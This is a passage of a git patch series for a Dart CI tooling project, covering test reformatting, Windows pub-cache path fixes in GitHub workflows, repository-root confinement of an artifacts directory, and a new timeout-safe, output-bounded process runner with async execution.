expect(rendered, contains('console.log"')); + expect(rendered, contains('manage_cicd test 2>&1')); + } }); test('feature flags render expected snippets', () { @@ -1638,10 +1413,7 @@ void main() { // ---- render(existingContent) / _preserveUserSections ---- group('render(existingContent) preserves user sections', () { test('user section content is preserved when existingContent has custom lines in a user block', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Append a user block with content so extraction finds it (first occurrence is empty) const customBlock = ''' @@ -1659,10 +1431,7 @@ void main() { }); test('CRLF normalization: existing content with \\r\\n still preserves sections', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); const customContent = '\r\n - run: echo "crlf-test"\r\n'; final existing = base.replaceFirst( @@ -1675,10 +1444,7 @@ void main() { }); test('multiple user sections preserve independently', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); var existing = base; existing = existing.replaceFirst( @@ -1701,10 +1467,7 @@ void main() { }); test('empty/whitespace-only existing user section does not overwrite rendered section', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Existing has pre-test with only whitespace; post-test has real content final existing = base @@ -1718,19 +1481,13 @@ void main() { ); final rendered = gen.render(existingContent: existing); // pre-test: whitespace-only was skipped, so rendered keeps empty placeholder - expect( - rendered, - contains('# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---'), - ); + expect(rendered, contains('# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---')); // post-test: real content was preserved expect(rendered, contains('echo kept')); }); test('unknown section name in existing content is silently ignored', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Add a user section that doesn't exist in the skeleton final existing = '$base\n# --- BEGIN USER: nonexistent ---\n custom: stuff\n# --- END USER: nonexistent ---\n'; @@ -1743,10 +1500,7 @@ void main() { }); test('malformed section markers (missing END) are ignored', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Inject a BEGIN without matching END — regex won't match, so it's ignored final existing = base.replaceFirst( @@ -1759,10 +1513,7 @@ void main() { }); test('mismatched section names (BEGIN X / END Y) are ignored', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); final existing = base.replaceFirst( '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', @@ -1774,10 +1525,7 @@ void main() { }); test('section content with regex-special characters is preserved verbatim', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Content with regex special chars: $, (), *, +, ?, |, ^, {, } const specialContent = r' - run: echo "${{ matrix.os }}" && test [[ "$(whoami)" == "ci" ]]'; @@ -1790,20 +1538,14 @@ void main() { }); test('null existingContent produces same output as no existingContent', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final withoutExisting = gen.render(); final withNull = gen.render(existingContent: null); expect(withNull, equals(withoutExisting)); }); test('existingContent with no user sections produces same output as fresh render', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final fresh = gen.render(); // Use a completely unrelated string as existing content final rendered = gen.render(existingContent: 'name: SomeOtherWorkflow\non: push'); @@ -1815,10 +1557,7 @@ void main() { group('feature flag combinations', () { test('format_check + web_test: web-test needs includes auto-format', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'format_check': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'format_check': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1830,10 +1569,7 @@ void main() { }); test('web_test without format_check: web-test needs omits auto-format', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: true), toolingVersion: '0.0.0-test'); final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; final webTestJob = parsed['jobs']['web-test'] as YamlMap; @@ -1844,10 +1580,7 @@ void main() { test('build_runner + web_test: web-test job contains build_runner step', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'build_runner': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'build_runner': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1860,10 +1593,7 @@ void main() { test('proto + web_test: web-test job contains proto steps', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'proto': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'proto': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1876,10 +1606,7 @@ void main() { test('multi-platform + web_test: web-test depends on analyze (not test)', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - platforms: ['ubuntu', 'macos'], - ), + ciConfig: _minimalValidConfig(webTest: true, platforms: ['ubuntu', 'macos']), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1891,12 +1618,9 @@ void main() { expect(needs, isNot(contains('analyze-and-test'))); }); - test('single-platform + web_test: web-test does not depend on analyze-and-test', () { + test('single-platform + web_test: web-test depends on analyze-and-test', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - platforms: ['ubuntu'], - ), + ciConfig: _minimalValidConfig(webTest: true, platforms: ['ubuntu']), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1904,13 +1628,12 @@ void main() { final webTestJob = parsed['jobs']['web-test'] as YamlMap; final needs = (webTestJob['needs'] as YamlList).toList(); expect(needs, contains('pre-check')); - expect(needs, isNot(contains('analyze-and-test'))); + expect(needs, contains('analyze-and-test')); }); test('secrets render in web-test job env block', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true) - ..['secrets'] = {'API_KEY': 'MY_SECRET'}, + ciConfig: _minimalValidConfig(webTest: true)..['secrets'] = {'API_KEY': 'MY_SECRET'}, toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1923,10 +1646,7 @@ void main() { test('lfs + web_test: web-test checkout has lfs: true', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'lfs': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'lfs': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1938,20 +1658,14 @@ void main() { test('managed_test in multi-platform: test job uses managed test command', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - featureOverrides: {'managed_test': true}, - platforms: ['ubuntu', 'macos'], - ), + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['ubuntu', 'macos']), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; final testJob = parsed['jobs']['test'] as YamlMap; final steps = (testJob['steps'] as YamlList).toList(); - final testStep = steps.firstWhere( - (s) => s is YamlMap && s['name'] == 'Test', - orElse: () => null, - ); + final testStep = steps.firstWhere((s) => s is YamlMap && s['name'] == 'Test', orElse: () => null); expect(testStep, isNotNull); expect((testStep as YamlMap)['run'], contains('manage_cicd test')); }); @@ -1960,7 +1674,10 @@ void main() { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig( webTest: true, - webTestConfig: {'concurrency': 4, 'paths': ['test/web/']}, + webTestConfig: { + 'concurrency': 4, + 'paths': ['test/web/'], + }, featureOverrides: { 'proto': true, 'lfs': true, @@ -1993,10 +1710,7 @@ void main() { }); test('no features enabled (all false) renders minimal valid YAML', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; final jobs = parsed['jobs'] as YamlMap; @@ -2037,6 +1751,29 @@ void main() { final job = parsed['jobs']['analyze-and-test'] as YamlMap; expect(job['runs-on'], equals('my-custom-runner')); }); + + test('artifact retention-days policy applied consistently (7 days)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('retention-days: 7')); + expect(rendered, contains('Policy: test artifact retention-days = 7')); + }); + + test('Windows pub-cache path uses format for Dart default (%LOCALAPPDATA%\\Pub\\Cache)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(platforms: ['windows']), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('Pub')); + expect(rendered, contains('Cache')); + expect(rendered, contains('env.LOCALAPPDATA')); + expect(rendered, contains("'~/.pub-cache'")); + expect(rendered, contains("runner.os == 'Windows'")); + }); }); }); } From 6e0466663cd0b257d5873898e4693f1bbc30538f Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:02:05 -0500 Subject: [PATCH 12/16] fix: harden process execution and runtime config boundaries Address post-review reliability and safety gaps by adding timeout-safe process execution with explicit kill semantics, bounded output capture, and fatal-path flush behavior. Also harden runtime sub-package loading with workflow-equivalent validation, align Windows pub-cache path handling across workflow templates, and gate issue-triage npm installation behind trigger conditions. Expand utility coverage for timeout handling, fatal-exit probe behavior, and runtime sub-package validation paths. --- .github/workflows/issue-triage.yaml | 3 +- .github/workflows/release.yaml | 16 +- .../cli/commands/create_release_command.dart | 57 ++- lib/src/cli/commands/update_all_command.dart | 9 +- lib/src/cli/utils/process_runner.dart | 124 +++++- lib/src/cli/utils/sub_package_utils.dart | 26 +- lib/src/cli/utils/tool_installers.dart | 30 +- lib/src/cli/utils/workflow_generator.dart | 33 ++ .../workflows/issue-triage.template.yaml | 3 +- .../github/workflows/release.template.yaml | 16 +- test/cli_utils_test.dart | 353 ++++++++++++++---- test/scripts/fatal_exit_probe.dart | 14 + 12 files changed, 554 insertions(+), 130 deletions(-) create mode 100644 test/scripts/fatal_exit_probe.dart diff --git a/.github/workflows/issue-triage.yaml b/.github/workflows/issue-triage.yaml index f632fc7..770bd69 100644 --- a/.github/workflows/issue-triage.yaml +++ b/.github/workflows/issue-triage.yaml @@ -67,7 +67,7 @@ jobs: if: steps.trigger.outputs.run == 'true' uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -80,6 +80,7 @@ jobs: node-version: "22" - run: npm install -g @google/gemini-cli@latest + if: steps.trigger.outputs.run == 'true' - name: Cache Go modules (GitHub MCP server) if: steps.trigger.outputs.run == 'true' diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index c13875b..78511ad 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -84,7 +84,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -158,7 +158,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -242,7 +242,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -333,7 +333,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -438,7 +438,7 @@ jobs: - name: Cache Dart pub uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-pub-${{ hashFiles('**/pubspec.lock') }} restore-keys: ${{ runner.os }}-pub- @@ -538,7 +538,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -679,7 +679,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -805,7 +805,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/lib/src/cli/commands/create_release_command.dart b/lib/src/cli/commands/create_release_command.dart index 6348b90..3d22561 100644 --- a/lib/src/cli/commands/create_release_command.dart +++ b/lib/src/cli/commands/create_release_command.dart @@ -2,6 +2,7 @@ import 'dart:convert'; import 'dart:io'; import 'package:args/command_runner.dart'; +import 'package:path/path.dart' as p; import 'package:pub_semver/pub_semver.dart'; import '../../triage/utils/config.dart'; @@ -70,7 +71,12 @@ class CreateReleaseCommand extends Command { // Step 1: Copy artifacts if provided if (artifactsDir != null) { - final artDir = Directory('$repoRoot/$artifactsDir'); + final artifactsPath = p.normalize(p.join(repoRoot, artifactsDir)); + if (!(artifactsPath == repoRoot || p.isWithin(repoRoot, artifactsPath))) { + Logger.error('--artifacts-dir must resolve within the repository root'); + exit(1); + } + final artDir = Directory(artifactsPath); if (artDir.existsSync()) { for (final name in ['CHANGELOG.md', 'README.md']) { final src = File('${artDir.path}/$name'); @@ -236,8 +242,13 @@ class CreateReleaseCommand extends Command { // Step 4: Commit all changes Logger.info('Configuring git identity for release commit'); - CiProcessRunner.exec('git', ['config', 'user.name', 'github-actions[bot]'], cwd: repoRoot, verbose: global.verbose); - CiProcessRunner.exec( + await CiProcessRunner.exec( + 'git', + ['config', 'user.name', 'github-actions[bot]'], + cwd: repoRoot, + verbose: global.verbose, + ); + await CiProcessRunner.exec( 'git', ['config', 'user.email', 'github-actions[bot]@users.noreply.github.com'], cwd: repoRoot, @@ -264,7 +275,7 @@ class CreateReleaseCommand extends Command { for (final path in filesToAdd) { final fullPath = '$repoRoot/$path'; if (File(fullPath).existsSync() || Directory(fullPath).existsSync()) { - CiProcessRunner.exec('git', ['add', path], cwd: repoRoot, verbose: global.verbose); + await CiProcessRunner.exec('git', ['add', path], cwd: repoRoot, verbose: global.verbose); } } @@ -281,7 +292,7 @@ class CreateReleaseCommand extends Command { // Use a temp file for the commit message to avoid shell escaping issues final commitMsgFile = File('$repoRoot/.git/RELEASE_COMMIT_MSG'); commitMsgFile.writeAsStringSync(commitMsg); - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['commit', '-F', commitMsgFile.path], cwd: repoRoot, @@ -295,7 +306,7 @@ class CreateReleaseCommand extends Command { final remoteRepo = Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; if (ghToken != null && remoteRepo.isNotEmpty) { Logger.info('Setting authenticated remote URL for push'); - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['remote', 'set-url', 'origin', 'https://x-access-token:$ghToken@github.com/$remoteRepo.git'], cwd: repoRoot, @@ -311,15 +322,27 @@ class CreateReleaseCommand extends Command { if (pushResult.exitCode != 0) { Logger.warn('Direct push failed (non-fast-forward); fetching and merging remote changes...'); if (global.verbose) Logger.info(' push stderr: ${(pushResult.stderr as String).trim()}'); - CiProcessRunner.exec('git', ['fetch', 'origin', 'main'], cwd: repoRoot, fatal: true, verbose: global.verbose); - CiProcessRunner.exec( + await CiProcessRunner.exec( + 'git', + ['fetch', 'origin', 'main'], + cwd: repoRoot, + fatal: true, + verbose: global.verbose, + ); + await CiProcessRunner.exec( 'git', ['merge', 'origin/main', '--no-edit'], cwd: repoRoot, fatal: true, verbose: global.verbose, ); - CiProcessRunner.exec('git', ['push', 'origin', 'main'], cwd: repoRoot, fatal: true, verbose: global.verbose); + await CiProcessRunner.exec( + 'git', + ['push', 'origin', 'main'], + cwd: repoRoot, + fatal: true, + verbose: global.verbose, + ); } Logger.success('Committed and pushed changes'); } else { @@ -333,14 +356,14 @@ class CreateReleaseCommand extends Command { Logger.error('Tag $tag already exists. Cannot create release.'); exit(1); } - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['tag', '-a', tag, '-m', 'Release v$newVersion'], cwd: repoRoot, fatal: true, verbose: global.verbose, ); - CiProcessRunner.exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true, verbose: global.verbose); + await CiProcessRunner.exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true, verbose: global.verbose); Logger.success('Created tag: $tag'); // Step 5b: Create per-package tags for sub-packages with tag_pattern @@ -356,14 +379,20 @@ class CreateReleaseCommand extends Command { continue; } try { - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['tag', '-a', pkgTag, '-m', '${pkg['name']} v$newVersion'], cwd: repoRoot, fatal: true, verbose: global.verbose, ); - CiProcessRunner.exec('git', ['push', 'origin', pkgTag], cwd: repoRoot, fatal: true, verbose: global.verbose); + await CiProcessRunner.exec( + 'git', + ['push', 'origin', pkgTag], + cwd: repoRoot, + fatal: true, + verbose: global.verbose, + ); pkgTagsCreated.add(pkgTag); } catch (e) { Logger.error('Failed to create per-package tag $pkgTag: $e'); @@ -400,7 +429,7 @@ class CreateReleaseCommand extends Command { final ghArgs = ['release', 'create', tag, '--title', 'v$newVersion', '--notes', releaseBody]; if (effectiveRepo.isNotEmpty) ghArgs.addAll(['--repo', effectiveRepo]); - CiProcessRunner.exec('gh', ghArgs, cwd: repoRoot, verbose: global.verbose); + await CiProcessRunner.exec('gh', ghArgs, cwd: repoRoot, verbose: global.verbose); Logger.success('Created GitHub Release: $tag'); // Build rich summary diff --git a/lib/src/cli/commands/update_all_command.dart b/lib/src/cli/commands/update_all_command.dart index 189302d..74de8f6 100644 --- a/lib/src/cli/commands/update_all_command.dart +++ b/lib/src/cli/commands/update_all_command.dart @@ -1,6 +1,5 @@ // ignore_for_file: avoid_print -import 'dart:async'; import 'dart:io'; import 'package:args/command_runner.dart'; @@ -10,6 +9,7 @@ import '../../triage/utils/config.dart' show kConfigFileName; import '../manage_cicd_cli.dart'; import '../options/update_all_options.dart'; import '../utils/logger.dart'; +import '../utils/process_runner.dart'; /// Batch-update all packages under a root directory. /// @@ -235,11 +235,14 @@ class UpdateAllCommand extends Command { execArgs = ['run', 'runtime_ci_tooling:manage_cicd', ...args]; } - final result = await Process.run( + final result = await CiProcessRunner.runWithTimeout( executable, execArgs, workingDirectory: pkg.path, - ).timeout(const Duration(minutes: 5), onTimeout: () => ProcessResult(0, 124, '', 'Timed out after 5 minutes')); + timeout: const Duration(minutes: 5), + timeoutExitCode: 124, + timeoutMessage: 'Timed out after 5 minutes', + ); sw.stop(); diff --git a/lib/src/cli/utils/process_runner.dart b/lib/src/cli/utils/process_runner.dart index d15aec0..453a8f7 100644 --- a/lib/src/cli/utils/process_runner.dart +++ b/lib/src/cli/utils/process_runner.dart @@ -1,7 +1,13 @@ +import 'dart:async'; +import 'dart:convert'; import 'dart:io'; +import 'exit_util.dart'; import 'logger.dart'; +/// Maximum bytes to capture per stdout/stderr stream for timeout runs. +const int _kMaxOutputBytes = 32 * 1024; // 32KB + /// Utilities for running external processes. abstract final class CiProcessRunner { /// Patterns that look like tokens/secrets — redact before logging. @@ -45,13 +51,123 @@ abstract final class CiProcessRunner { return output; } - /// Execute a command. Set [fatal] to true to exit on failure. - static void exec(String executable, List args, {String? cwd, bool fatal = false, bool verbose = false}) { + /// Execute a command. Set [fatal] to true to exit on failure (flushes stdout/stderr before exiting). + static Future exec( + String executable, + List args, { + String? cwd, + bool fatal = false, + bool verbose = false, + }) async { if (verbose) Logger.info(' \$ ${_redact('$executable ${args.join(" ")}')}'); final result = Process.runSync(executable, args, workingDirectory: cwd); if (result.exitCode != 0) { - Logger.error(' Command failed (exit ${result.exitCode}): ${result.stderr}'); - if (fatal) exit(result.exitCode); + final stderr = _redact((result.stderr as String).trim()); + Logger.error(' Command failed (exit ${result.exitCode}): $stderr'); + if (fatal) await exitWithCode(result.exitCode); + } + } + + /// Runs [executable] with [arguments] and [timeout]. On timeout, kills the + /// process (TERM then KILL on Unix; single kill on Windows) and returns a + /// [ProcessResult] with [timeoutExitCode] and stderr containing [timeoutMessage]. + /// Captures stdout/stderr with bounded buffers ([_kMaxOutputBytes] per stream). + static Future runWithTimeout( + String executable, + List arguments, { + String? workingDirectory, + Duration timeout = const Duration(minutes: 5), + int timeoutExitCode = 124, + String timeoutMessage = 'Timed out', + }) async { + final process = await Process.start(executable, arguments, workingDirectory: workingDirectory); + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + final stdoutBytes = [0]; + final stderrBytes = [0]; + final stdoutTruncated = [false]; + final stderrTruncated = [false]; + const truncationSuffix = '\n\n... (output truncated).'; + final truncationBytes = utf8.encode(truncationSuffix).length; + + void capWrite(StringBuffer buf, String data, int maxBytes, List truncated, List byteCount) { + if (truncated[0]) return; + final dataBytes = utf8.encode(data).length; + if (byteCount[0] + dataBytes <= maxBytes) { + buf.write(data); + byteCount[0] += dataBytes; + } else { + final remainingTotal = maxBytes - byteCount[0]; + if (remainingTotal <= truncationBytes) { + truncated[0] = true; + return; + } + final payloadBudget = remainingTotal - truncationBytes; + final bytes = utf8.encode(data); + final toTake = bytes.length > payloadBudget ? payloadBudget : bytes.length; + if (toTake > 0) { + buf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + byteCount[0] += toTake; + } + buf.write(truncationSuffix); + byteCount[0] += truncationBytes; + truncated[0] = true; + } + } + + final stdoutSub = process.stdout + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stdoutBuf, data, _kMaxOutputBytes, stdoutTruncated, stdoutBytes)); + final stderrSub = process.stderr + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stderrBuf, data, _kMaxOutputBytes, stderrTruncated, stderrBytes)); + final stdoutDone = stdoutSub.asFuture(); + final stderrDone = stderrSub.asFuture(); + + var exitCode = timeoutExitCode; + var timedOut = false; + try { + exitCode = await process.exitCode.timeout(timeout); + } on TimeoutException { + timedOut = true; + await killAndAwaitExit(process); + } + + try { + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + } catch (_) { + // Best-effort drain complete. + } finally { + try { + await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); + } catch (_) {} + } + + if (timedOut) { + return ProcessResult(process.pid, timeoutExitCode, stdoutBuf.toString(), timeoutMessage); + } + + return ProcessResult(process.pid, exitCode, stdoutBuf.toString(), stderrBuf.toString()); + } + + /// Kills [process] and awaits exit. On Unix: SIGTERM first, wait up to 5s; + /// if still alive, SIGKILL and await. On Windows: single kill, then await. + static Future killAndAwaitExit(Process process) async { + if (Platform.isWindows) { + process.kill(); + try { + await process.exitCode.timeout(const Duration(seconds: 10)); + } on TimeoutException { + // Best-effort on Windows; caller has already timed out. + } + return; + } + process.kill(ProcessSignal.sigterm); + try { + await process.exitCode.timeout(const Duration(seconds: 5)); + } on TimeoutException { + process.kill(ProcessSignal.sigkill); + await process.exitCode; } } } diff --git a/lib/src/cli/utils/sub_package_utils.dart b/lib/src/cli/utils/sub_package_utils.dart index 3de910e..9a7d810 100644 --- a/lib/src/cli/utils/sub_package_utils.dart +++ b/lib/src/cli/utils/sub_package_utils.dart @@ -28,18 +28,20 @@ abstract final class SubPackageUtils { if (ciConfig == null) return []; final raw = ciConfig['sub_packages'] as List?; if (raw == null || raw.isEmpty) return []; - return raw - .whereType>() - .where((sp) => sp['name'] != null && sp['path'] != null) - .map( - (sp) => { - ...sp, - // Normalize: strip trailing slashes to avoid double-slash paths - // in downstream consumers (git commands, Markdown, etc.). - 'path': (sp['path'] as String).replaceAll(RegExp(r'/+$'), ''), - }, - ) - .toList(); + final seenNames = {}; + final seenPaths = {}; + final result = >[]; + for (final item in raw) { + if (item is! Map) continue; + if (item['name'] == null || item['path'] == null) continue; + final err = WorkflowGenerator.validateSubPackageEntry(item, seenNames, seenPaths); + if (err != null) { + Logger.warn('Skipping invalid sub-package "${item['name']}": $err'); + continue; + } + result.add({...item, 'path': (item['path'] as String).replaceAll(RegExp(r'/+$'), '')}); + } + return result; } /// Build a per-package diff summary suitable for appending to a Gemini prompt. diff --git a/lib/src/cli/utils/tool_installers.dart b/lib/src/cli/utils/tool_installers.dart index f6678f2..36489e9 100644 --- a/lib/src/cli/utils/tool_installers.dart +++ b/lib/src/cli/utils/tool_installers.dart @@ -36,17 +36,17 @@ abstract final class ToolInstallers { static Future installNodeJs() async { if (Platform.isMacOS) { Logger.info('Installing Node.js via Homebrew...'); - CiProcessRunner.exec('brew', ['install', 'node']); + await CiProcessRunner.exec('brew', ['install', 'node']); } else if (Platform.isLinux) { Logger.info('Installing Node.js via apt...'); - CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'nodejs', 'npm']); + await CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'nodejs', 'npm']); } else if (Platform.isWindows) { if (CiProcessRunner.commandExists('winget')) { Logger.info('Installing Node.js via winget...'); - CiProcessRunner.exec('winget', ['install', 'OpenJS.NodeJS']); + await CiProcessRunner.exec('winget', ['install', 'OpenJS.NodeJS']); } else if (CiProcessRunner.commandExists('choco')) { Logger.info('Installing Node.js via Chocolatey...'); - CiProcessRunner.exec('choco', ['install', 'nodejs', '-y']); + await CiProcessRunner.exec('choco', ['install', 'nodejs', '-y']); } else { Logger.error('Install Node.js manually: https://nodejs.org/'); } @@ -59,16 +59,16 @@ abstract final class ToolInstallers { return; } Logger.info('Installing Gemini CLI via npm...'); - CiProcessRunner.exec('npm', ['install', '-g', '@google/gemini-cli@latest']); + await CiProcessRunner.exec('npm', ['install', '-g', '@google/gemini-cli@latest']); } static Future installGitHubCli() async { if (Platform.isMacOS) { Logger.info('Installing GitHub CLI via Homebrew...'); - CiProcessRunner.exec('brew', ['install', 'gh']); + await CiProcessRunner.exec('brew', ['install', 'gh']); } else if (Platform.isLinux) { Logger.info('Installing GitHub CLI via apt...'); - CiProcessRunner.exec('sh', [ + 